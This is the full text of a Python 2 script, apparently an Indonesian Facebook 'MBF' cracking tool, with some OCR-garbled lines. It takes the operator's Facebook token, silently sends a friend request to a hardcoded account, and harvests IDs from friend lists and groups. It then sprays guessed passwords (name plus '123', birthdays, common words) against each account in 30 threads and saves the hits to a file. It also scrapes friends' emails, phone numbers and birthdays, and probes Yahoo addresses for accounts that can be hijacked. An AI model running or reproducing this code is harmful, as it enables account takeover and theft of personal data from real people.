```
#!/usr/bin/python2
# coding=utf-8
import
os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id)
Presto/2.12.423 Version/12.16')]
def keluar():
       print "\033[1;96m[!] \x1b[1;91mExit"
       os.sys.exit()
def acak(x):
  w = 'mhkbpcP'
  d = "
  for i in x:
     d += '!'+w[random.randint(0,len(w)-1)]+i
  return cetak(d)
def cetak(x):
  w = 'mhkbpcP'
  for i in w:
    j = w.index(i)
     x = x.replace('!%s'\%i,'\033[\%s;1m'\%str(31+j))
  x += '\033[0m'
  x = x.replace('!0','\033[0m')
  sys.stdout.write(x+'\n')
```

```
def jalan(z):
      for e in z + '\n':
            sys.stdout.write(e)
            sys.stdout.flush()
            time.sleep(0.05)
|\x1b[1;92m| |_| |\x1b[1;94m| ||| \x1b[1;91m| |_| |\n \x1b[1;93m| || |\x1b[1;92m|
|\x1b[1;94m| |_||_ \x1b[1;91m| _|\n \x1b[1;93m| |_| |\x1b[1;92m| |\x1b[1;94m|
\\x1b[1;91m\ \_\n\x1b[1;93m\ \_\\x1b[1;92m\ \_\|\x1b[1;94m\ \| \| \|\x1b[1;91m\ \_\|\n
\x1b[1;93m|____| \x1b[1;92m|__| |__|\x1b[1;94m|___| |__|\x1b[1;91m|___| |__|
\x1b[1;96mFB\n\n
\x1b[1;95m•-
——•\n ★╬—\x1b[1;92mReCode \x1b[1;91m: \x1b[1;93momalip
                                                               \x1b[1;95m—#★\n
★#-\x1b[1;92mFB \x1b[1;92m \x1b[1;91m: \x1b[1;96mFacebook.com/theomalip
\x1b[1;95m—‡★\n ★非—\x1b[1;92mGitHub \x1b[1;91m: \x1b[1;94mGithub.com/storiku
\x1b[1;95m—#★\n
,,,,,,
def tik():
      titik = ['. ','.. ','... ']
      for o in titik:
            print("\r\033[1;96m[•] \x1b[1;93mSedang masuk
\x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
def siapa():
      os.system('clear')
      nama = raw input("\033[1;97mSiapa nama kamu ? \033[1;91m: \033[1;92m")
      if nama =="":
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print"\033[1;96m[!] \033[1;91mlsi yang benar"
              time.sleep(1)
              siapa()
       else:
              os.system('clear')
              jalan("\033[1;97mSelamat datang \033[1;92m" +nama+
"\n\033[1;97mTerimakasih telah menggunakan tools ini !!")
              time.sleep(1)
              loginSC()
def loginSC():
       os.system('clear')
       print"\033[1;97mSilahkan login SC nya dulu bosque\n"
       username = raw_input("\033[1;96m[*] \033[1;97mUsername \033[1;91m: \033[1;92m")
       password = raw_input("\033[1;96m[*]\033[1;97mPassword\033[1;91m:\033[1;92m")]
       if username =="dark" and password =="fb":
              print"\033[1;96m[ ✓ ] \033[1;92mLogin success"
              time.sleep(1)
              login()
       else:
              print"\033[1;96m[!] \033[1;91mSalah!!"
              time.sleep(1)
         LoginSC()
def login():
       os.system('clear')
       try:
              toket = open('login.txt','r')
              menu()
       except (KeyError,IOError):
              os.system('clear')
              print logo
              print 42*"\033[1;96m="
              print('\033[1;96m[☆] \x1b[1;93mLOGIN AKUN FACEBOOK ANDA
\x1b[1;96m[☆]')
              id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')]
              pwd = raw_input('\033[1;96m[+] \times 1b[1;93mPassword \times 1b[1;91m: \times 1b[1;92m')])
              tik()
              try:
                     br.open('https://m.facebook.com')
              except mechanize.URLError:
                     print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
```

```
keluar()
              br._factory.is_html = True
              br.select_form(nr=0)
              br.form['email'] = id
              br.form['pass'] = pwd
              br.submit()
              url = br.geturl()
              if 'save-device' in url:
                     try:
                            sig=
'api key=882a8490361da98702bf97a021ddc14dcredentials type=passwordemail='+id+'format=
JSONgenerate machine id=1generate session cookies=1locale=en USmethod=auth.loginpas
sword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
                            data =
{"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"fo
rmat":"JSON",
"generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.log
in","password":pwd,"return_ssl_resources":"0","v":"1.0"}
                            x=hashlib.new("md5")
                            x.update(sig)
                            a=x.hexdigest()
                            data.update({'sig':a})
                            url = "https://api.facebook.com/restserver.php"
                            r=requests.get(url,params=data)
                            z=json.loads(r.text)
                            unikers = open("login.txt", 'w')
                            unikers.write(z['access token'])
                            unikers.close()
                            print '\n\033[1;96m[ ✓ ] \x1b[1;92mLogin Berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access t
oken='+z['access_token'])
                            os.system('xdg-open https://www.youtube.com/omaliptv')
                            menu()
                     except requests.exceptions.ConnectionError:
                            print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
                            keluar()
              if 'checkpoint' in url:
                     print("\n\033[1;96m[!] \x1b[1;91mSepertinya akun anda kena checkpoint")
                     os.system('rm -rf login.txt')
                     time.sleep(1)
                     keluar()
              else:
```

```
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email salah")
                      os.system('rm -rf login.txt')
                      time.sleep(1)
                      login()
def menu():
       os.system('clear')
       try:
              toket=open('login.txt','r').read()
       except IOError:
              os.system('clear')
              print"\033[1;96m[!] \x1b[1;91mToken invalid"
              os.system('rm -rf login.txt')
              time.sleep(1)
              keluar()
       try:
              otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
              a = json.loads(otw.text)
              nama = a['name']
              id = a['id']
       except KeyError:
              os.system('clear')
              print"\033[1;96m[!] \033[1;91mToken invalid"
              os.system('rm -rf login.txt')
              time.sleep(1)
              login()
       except requests.exceptions.ConnectionError:
              print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
              keluar()
       os.system("clear")
       print logo
       print 42*"\033[1;96m="
       print "\033[1;96m[\033[1;97m ✓ \033[1;96m]\033[1;93m Nama \033[1;91m:
\033[1;92m"+nama+"\033[1;97m
       print "\033[1;96m[\033[1;97m ✓ \033[1;96m]\033[1;93m ID \033[1;91m:
\033[1;92m"+id+"\x1b[1;97m
       print 42*"\033[1;96m="
       print "\x1b[1;97m1.\x1b[1;93m Hack facebook MBF"
       print "\x1b[1;97m2.\x1b[1;93m Lihat daftar grup
       print "\x1b[1;97m3.\x1b[1;93m Informasi akun
       print "\x1b[1;97m4.\x1b[1;93m Yahoo clone
       print "\n\x1b[1;91m0.\x1b[1;91m Logout
```

```
pilih()
```

```
def pilih():
       unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
       if unikers =="":
               print "\033[1;96m[!] \x1b[1;91mlsi yang benar"
       elif unikers =="1":
               super()
       elif unikers =="2":
               grupsaya()
       elif unikers =="3":
               informasi()
       elif unikers =="4":
               yahoo()
       elif unikers =="0":
               os.system('clear')
               jalan('Menghapus token')
               os.system('rm -rf login.txt')
               keluar()
       else:
               print "\033[1;96m[!] \x1b[1;91mlsi yang benar"
               pilih()
def super():
       global toket
       os.system('clear')
       try:
               toket=open('login.txt','r').read()
       except IOError:
               print"\033[1;96m[!] \x1b[1;91mToken invalid"
               os.system('rm -rf login.txt')
               time.sleep(1)
               keluar()
       os.system('clear')
       print logo
       print 42*"\033[1;96m="
       print "\x1b[1;97m1.\x1b[1;93m Crack dari daftar teman"
       print "\x1b[1;97m2.\x1b[1;93m Crack dari teman"
       print "\x1b[1;97m3.\x1b[1;93m Crack dari member grup"
       print "\x1b[1;97m4.\x1b[1;93m Crack dari file"
```

```
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
       pilih_super()
def pilih_super():
       peak = raw input("\n\033[1;97m >>> \033[1;97m")
       if peak =="":
              print "\033[1;96m[!] \x1b[1;91mlsi yang benar"
              pilih_super()
       elif peak =="1":
              os.system('clear')
              print logo
              print 42*"\033[1;96m="
              jalan('\033[1;96m[*]\033[1;93mMengambil ID\033[1;97m...')
              r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
              z = json.loads(r.text)
              for s in z['data']:
                      id.append(s['id'])
       elif peak =="2":
              os.system('clear')
              print logo
              print 42*"\033[1;96m="
              idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m:
\033[1;97m")
              try:
                     jok =
requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
                      op = json.loads(jok.text)
                      print"\033[1;96m[\033[1;97m ✓ \033[1;96m] \033[1;93mNama
teman\033[1;91m :\033[1;97m "+op["name"]
              except KeyError:
                      print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
                      raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")]
                      super()
              jalan('\033[1;96m[*]\033[1;93mMengambil ID\033[1;97m...')
requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
              z = json.loads(r.text)
              for i in z['data']:
                     id.append(i['id'])
       elif peak =="3":
              os.system('clear')
              print logo
              print 42*"\033[1;96m="
```

```
idg=raw_input('\033[1;96m[+]\033[1;93mMasukan ID group
\033[1;91m:\033[1;97m')
              try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access token='+toket)
                      asw=json.loads(r.text)
                      print"\033[1;96m[\033[1;97m ✓ \033[1;96m] \033[1;93mNama group
\033[1;91m:\033[1;97m "+asw['name']
              except KeyError:
                      print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
                      raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
                      super()
              jalan('\033[1;96m[*]\033[1;93mMengambil ID\033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999
&access token='+toket)
              s=json.loads(re.text)
              for p in s['data']:
                      id.append(p['id'])
       elif peak =="4":
              os.system('clear')
              print logo
              print 42*"\033[1;96m="
              try:
                      idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file
x1b[1;91m: x1b[1;97m')
                      for line in open(idlist,'r').readlines():
                             id.append(line.strip())
              except IOError:
                      print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
                      raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
                      super()
       elif peak =="0":
              menu()
       else:
              print "\033[1;96m[!] \x1b[1;91mlsi yang benar"
              pilih_super()
       print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
       titik = ['. ','.. ','... ']
       for o in titik:
              print("\r\033[1;96m[\033[1;97m *\033[1;96m] \033[1;93mCrack
\033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
```

```
print
       print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
       print 42*"\033[1;96m="
       def main(arg):
              global cekpoint,oks
              user = arg
              try:
                     os.mkdir('out')
              except OSError:
                     pass
              try:
                     a =
requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
                     b = json.loads(a.text)
                     pass1 = b['first_name']+'123'
                     data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655
%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk version=2&email="+(user)+
"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99f
b61fcd7aa0c44f58f522ef6")
                     q = json.load(data)
                     if 'access_token' in q:
                            print '\x1b[1;96m[ ✓ ] \x1b[1;92mBERHASIL'
                            print '\x1b[1;96m[*] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m'
+ b['name']
                            print '\x1b[1;96m[♣7] \x1b[1;97mID \x1b[1;91m
                                                                            : \x1b[1;92m' +
user
                            print '\x1b[1;96m[◄] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m'
+ pass1 + '\n'
                            oks.append(user+pass1)
                     else:
                            if 'www.facebook.com' in q["error_msg"]:
                                   print '\x1b[1;96m[¥] \x1b[1;93mCEKPOINT'
                                   print '\x1b[1;96m[*] \x1b[1;97mNama \x1b[1;91m :
x1b[1;93m' + b['name']
                                   print '\x1b[1;96m[4'] \x1b[1;97mID \x1b[1;91m
x1b[1;93m' + user]
                                   print '\x1b[1;96m[♣] \x1b[1;97mPassword \x1b[1;91m:
x1b[1;93m' + pass1 + '\n']
                                   cek = open("out/super_cp.txt", "a")
                                   cek.write("ID:" +user+ " Pw:" +pass1+"\n")
```

```
cek.close()
                                  cekpoint.append(user+pass1)
                           else:
                                  pass2 = b['first name']+'12345'
                                  data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655
%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+
"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99f
b61fcd7aa0c44f58f522ef6")
                                  q = json.load(data)
                                  if 'access_token' in q:
                                         print '\x1b[1;96m[ ✓ ] \x1b[1;92mBERHASIL'
                                         print '\x1b[1;96m[*] \x1b[1;97mNama \x1b[1;91m
: \x1b[1;92m' + b['name']
                                         print '\x1b[1;96m[♣] \x1b[1;97mID \x1b[1;91m
\x1b[1;92m' + user
                                         print '\x1b[1;96m[孝'] \x1b[1;97mPassword
x1b[1;91m: x1b[1;92m' + pass2 + '\n']
                                         oks.append(user+pass2)
                                  else:
                                         if 'www.facebook.com' in q["error_msg"]:
                                                 print '\x1b[1;96m[¥] \x1b[1;93mCEKPOINT'
                                                 print '\x1b[1;96m[ * ] \x1b[1;97mNama
x1b[1;91m : x1b[1;93m' + b['name']]
                                                 print '\x1b[1;96m[→ ] \x1b[1;97mID
\x1b[1;91m
             : \x1b[1;93m' + user
                                                 print '\x1b[1;96m[-✓] \x1b[1;97mPassword
x1b[1;91m: x1b[1;93m' + pass2 + '\n']
                                                 cek = open("out/super_cp.txt", "a")
                                                 cek.write("ID:" +user+ " Pw:" +pass2+"\n")
                                                 cek.close()
                                                 cekpoint.append(user+pass2)
                                         else:
                                                 pass3 = b['last_name'] + '123'
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655
%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+
"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99f
b61fcd7aa0c44f58f522ef6")
                                                q = json.load(data)
                                                 if 'access_token' in q:
                                                       print '\x1b[1;96m[✓]
\x1b[1;92mBERHASIL'
```

```
print '\x1b[1;96m[*]
x1b[1;97mNama x1b[1;91m : x1b[1;92m' + b['name']]
                                                       print '\x1b[1;96m[♣] \x1b[1;97mID
\x1b[1;91m
             : \x1b[1;92m' + user
                                                       print '\x1b[1;96m[孝]
\x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n'
                                                       oks.append(user+pass3)
                                                else:
                                                       if 'www.facebook.com' in
q["error_msg"]:
                                                               print '\x1b[1;96m[*]
\x1b[1;93mCEKPOINT'
                                                               print '\x1b[1;96m[*]
x1b[1;97mNama x1b[1;91m : x1b[1;93m' + b['name']]
                                                               print '\x1b[1;96m[孝']
\x1b[1;97mID \x1b[1;91m
                           : \x1b[1;93m' + user
                                                               print '\x1b[1;96m[孝']
\x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n'
                                                              cek =
open("out/super cp.txt", "a")
                                                              cek.write("ID:" +user+ " Pw:"
+pass3+"\n")
                                                               cek.close()
cekpoint.append(user+pass3)
                                                       else:
                                                              pass4 = 'Bangsat'
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655
%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk version=2&email="+(user)+
"&locale=en US&password="+(pass4)+"&sdk=ios&generate session cookies=1&sig=3f555f99f
b61fcd7aa0c44f58f522ef6")
                                                              q = json.load(data)
                                                              if 'access_token' in q:
                                                                      print '\x1b[1;96m[✓]
\x1b[1;92mBERHASIL'
                                                                      print '\x1b[1;96m[**]
x1b[1;97mNama x1b[1;91m : x1b[1;92m' + b['name']]
                                                                      print '\x1b[1;96m[孝']
x1b[1;97mID x1b[1;91m : x1b[1;92m' + user]]
                                                                      print '\x1b[1;96m[孝']
\x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n'
```

```
oks.append(user+pass4)
                                                               else:
                                                                       if
'www.facebook.com' in q["error_msg"]:
                                                                              print
'\x1b[1;96m[x] \x1b[1;93mCEKPOINT'
                                                                              print
'\x1b[1;96m[*] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
                                                                              print
\x1b[1;96m[\x3] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user]]
                                                                              print
\\x1b[1;96m[\(\psi\)]\\x1b[1;97mPassword \\x1b[1;91m: \\x1b[1;93m' + pass4 + \\n'
                                                                              cek =
open("out/super_cp.txt", "a")
                                                                              cek.write("ID:"
+user+ " Pw:" +pass4+"\n")
                                                                              cek.close()
cekpoint.append(user+pass4)
                                                                       else:
                                                                              birthday =
b['birthday']
                                                                              pass5 =
birthday.replace('/', ")
                                                                              data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655
%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk version=2&email="+(user)+
"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99f
b61fcd7aa0c44f58f522ef6")
                                                                              q =
ison.load(data)
                                                                              if
'access_token' in q:
                                                                                     print
'\x1b[1;96m[ ✓ ] \x1b[1;92mBERHASIL'
                                                                                     print
'\x1b[1;96m[*] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
                                                                                     print
'\x1b[1;96m[♣] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
                                                                                     print
'\x1b[1;96m[*] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n'
oks.append(user+pass5)
```

```
else:
                                                                                    if
'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[★] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[*] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[♣] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[*] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
                                                                                    else:
pass6 = 'Sayang'
data =
urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655
%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+
"&locale=en US&password="+(pass6)+"&sdk=ios&generate session cookies=1&sig=3f555f99f
b61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
       print '\x1b[1;96m[ ✓ ] \x1b[1;92mBERHASIL'
       print '\x1b[1;96m[*] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
       print '\x1b[1;96m[◄] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
       print '\x1b[1;96m[*] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n'
```

oks.append(user+pass6)

else:

```
if 'www.facebook.com' in q["error_msg"]:
              print '\x1b[1;96m[★] \x1b[1;93mCEKPOINT'
              print '\x1b[1;96m[*] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
              print '\x1b[1;96m[4] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
              print '\x1b[1;96m[*] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n'
              cek = open("out/super_cp.txt", "a")
              cek.write("ID:" +user+ " Pw:" +pass6+"\n")
              cek.close()
              cekpoint.append(user+pass6)
              except:
                     pass
       p = ThreadPool(30)
       p.map(main, id)
       print '\033[1;96m[\033[1;97m ✓ \033[1;96m] \033[1;92mSelesai \033[1;97m....'
       print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m:
\033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
       print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m:
\033[1;97mout/super_cp.txt")
       raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
       super()
def grupsaya():
       os.system('clear')
       try:
              toket=open('login.txt','r').read()
       except IOError:
              print"\033[1;96m[!] \x1b[1;91mToken invalid"
              os.system('rm -rf login.txt')
              time.sleep(1)
              keluar()
       try:
```

```
os.mkdir('out')
       except OSError:
              pass
       os.system('clear')
       print logo
       print 42*"\033[1;96m="
       try:
              uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
              gud = json.loads(uh.text)
              for p in gud['data']:
                     nama = p["name"]
                     id = p["id"]
                     f=open('out/Grupid.txt','w')
                     listgrup.append(id)
                     f.write(id + '\n')
                     print("\033[1;96m[✓] \033[1;92mGROUP SAYA")
                     print("\033[1;96m[♣] \033[1;97mID \033[1;91m: \033[1;92m"+str(id))
                     print("\033[1;96m[孝] \033[1;97mNama\033[1;91m:
033[1;92m"+str(nama) + '\n')
              print 42*"\033[1;96m="
              print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m
%s"%(len(listgrup))
              print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m:
\033[1;97mout/Grupid.txt")
              f.close()
              raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
              menu()
       except (KeyboardInterrupt,EOFError):
              print("\033[1;96m[!] \x1b[1;91mTerhenti")
              raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
              menu()
       except KeyError:
              os.remove('out/Grupid.txt')
              print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
              raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
              menu()
       except requests.exceptions.ConnectionError:
              print"\033[1;96m[X] \x1b[1;91mTidak ada koneksi"
              keluar()
       except IOError:
              print "\033[1;96m[!] \x1b[1;91mError"
              raw input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
              menu()
```

```
def informasi():
       os.system('clear')
       try:
              toket=open('login.txt','r').read()
       except IOError:
              print"\033[1;91m[!] Token invalid"
              os.system('rm -rf login.txt')
              time.sleep(1)
              keluar()
       os.system('clear')
       print logo
       print 42*"\033[1;96m="
       aid = raw_input('\033[1;96m[+] \033[1;93mMasukan ID/Nama\033[1;91m : \033[1;97m')
       jalan('\033[1;96m[*]\033[1;93mTunggu sebentar\033[1;97m...')
       r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
       cok = json.loads(r.text)
       for i in cok['data']:
              if aid in i['name'] or aid in i['id']:
requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
                     z = json.loads(x.text)
                      print 43*"\033[1;96m="
                      try:
                             print '\033[1;96m[*] \033[1;93mNama\033[1;97m
'+z['name']
                      except KeyError: print '\033[1;96m[?] \033[1;93mNama\033[1;97m
\033[1;91mTidak ada'
                      try:
                             print '\033[1;96m[*] \033[1;93mID\033[1;97m
                                                                                  : '+z['id']
                      except KeyError: print '\033[1;96m[?] \033[1;93mID\033[1;97m
\033[1;91mTidak ada'
                      try:
                             print '\033[1;96m[◄] \033[1;93mEmail\033[1;97m
                                                                                    : '+z['email']
                      except KeyError: print '\033[1;96m[?] \033[1;93mEmail\033[1;97m
\033[1;91mTidak ada'
                      try:
                             print '\033[1;96m[♣7] \033[1;93mNo HP\033[1;97m
'+z['mobile_phone']
                      except KeyError: print '\033[1;96m[?] \033[1;93mNo HP\033[1;97m
\033[1;91mTidak ada'
                      try:
                             print '\033[1;96m[◄] \033[1;93mTempat tinggal\033[1;97m:
```

```
'+z['location']['name']
                      except KeyError: print '\033[1;96m[?] \033[1;93mTempat
tinggal\033[1;97m: \033[1;91mTidak ada'
                      try:
                             print '\033[1;96m[◄] \033[1;93mTanggal lahir\033[1;97m:
'+z['birthday']
                      except KeyError: print '\033[1;96m[?] \033[1;93mTanggal lahir\033[1;97m
: \033[1;91mTidak ada'
                      try:
                             print '\033[1;96m[◄] \033[1;93mSekolah\033[1;97m
                             for q in z['education']:
                                    try:
                                            print '\033[1;91m
\033[1;97m'+q['school']['name']
                                    except KeyError: print '\033[1;91m
\033[1;91mTidak ada'
                      except KeyError: pass
                      raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
                      menu()
              else:
                      pass
       else:
              print"\033[1;96m[★] \x1b[1;91mAkun tidak ditemukan"
              raw input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
              menu()
def yahoo():
       global toket
       os.system('clear')
       try:
              toket=open('login.txt','r').read()
       except IOError:
              print"\033[1;91m[!] Token invalid"
              os.system('rm -rf login.txt')
              time.sleep(1)
              keluar()
       os.system('clear')
       print logo
       print 42*"\033[1;96m="
       print "\x1b[1;97m1.\x1b[1;93m Clone dari daftar teman"
       print "\x1b[1;97m2.\x1b[1;93m Clone dari teman"
       print "\x1b[1;97m3.\x1b[1;93m Clone dari member group"
       print "\x1b[1;97m4.\x1b[1;93m Clone dari file"
```

```
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
       clone()
def clone():
       embuh = raw input("\n\x1b[1;97m >>> ")
       if embuh =="":
              print "\033[1;96m[!] \x1b[1;91mlsi yang benar"
       elif embuh =="1":
              clone_dari_daftar_teman()
       elif embuh =="2":
              clone_dari_teman()
       elif embuh =="3":
              clone_dari_member_group()
       elif embuh =="4":
              clone_dari_file()
       elif embuh =="0":
              menu()
       else:
              print "\033[1;96m[!] \x1b[1;91mlsi yang benar"
def clone_dari_daftar_teman():
       global toket
       os.system('reset')
       try:
              toket=open('login.txt','r').read()
       except IOError:
              print"\033[1;91m[!] Token Invalid"
              os.system('rm -rf login.txt')
              time.sleep(1)
              keluar()
       try:
              os.mkdir('out')
       except OSError:
              pass
       os.system('clear')
       print logo
       mpsh = []
       jml = 0
       print 42*"\033[1;96m="
       jalan('\033[1;96m[\x1b[1;97m*\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
       teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
       kimak = json.loads(teman.text)
```

```
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
       print 42*"\033[1;96m="
       for w in kimak['data']:
              jml +=1
              mpsh.append(jml)
              id = w['id']
              nama = w['name']
              links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
              z = json.loads(links.text)
              try:
                     mail = z['email']
                     yahoo = re.compile(r'@.*')
                     otw = yahoo.search(mail).group()
                     if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.ya
hoo.com")
                            br. factory.is html = True
                            br.select form(nr=0)
                            br["username"] = mail
                            klik = br.submit().read()
                            jok =
re.compile(r"messages.ERROR_INVALID_USERNAME">.*')
                            try:
                                   pek = jok.search(klik).group()
                            except:
                                   continue
                            if "messages.ERROR_INVALID_USERNAME">' in pek:
                                    print("\033[1;96m[ ✓ ] \033[1;92mVULN")
                                    print("\033[1;96m[♣]\033[1;97mID\033[1;91m:
\033[1;92m"+id)
                                    print("\033[1;96m[♣]\033[1;97mEmail\033[1;91m:
\033[1;92m"+mail)
                                    print("\033[1;96m[♣]\033[1;97mNama\033[1;91m:
\033[1;92m"+nama+ '\n')
                                   save = open('out/MailVuln.txt','a')
                                   save.write("Nama : "+ nama + '\n' "ID
                                                                            : "+ id + '\n'
"Email: "+ mail + '\n\n')
                                   save.close()
                                    berhasil.append(mail)
              except KeyError:
                     pass
```

 $jalan('033[1;96m[\x1b[1;97m * \x1b[1;96m] \033[1;93mStart \033[1;97m...')]$ 

```
print 42*"\033[1;96m="
       print '\033[1;96m[\033[1;97m ✓ \033[1;96m] \033[1;92mSelesai \033[1;97m....'
       print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
       print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
       raw input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
       menu()
def clone_dari_teman():
       global toket
       os.system('clear')
       try:
              toket=open('login.txt','r').read()
       except IOError:
              print"\033[1;96m[!] \x1b[1;91mToken invalid"
              os.system('rm -rf login.txt')
              time.sleep(1)
              keluar()
       try:
              os.mkdir('out')
       except OSError:
              pass
       os.system('clear')
       print logo
       mpsh = []
       jml = 0
       print 42*"\033[1;96m="
       idt = raw_input("\033[1;96m[+]\033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")]
       try:
              jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
              op = json.loads(jok.text)
              print"\033[1;96m[\033[1;97m ✓ \033[1;96m] \033[1;93mNama\033[1;91m
:\033[1;97m "+op["name"]
       except KeyError:
              print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
              raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
              menu()
       jalan('\033[1;96m[ *] \033[1;93mMengambil email \033[1;97m...')
       teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
       kimak = json.loads(teman.text)
       jalan('\033[1;96m[*] \033[1;93mStart \033[1;97m...')
       print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
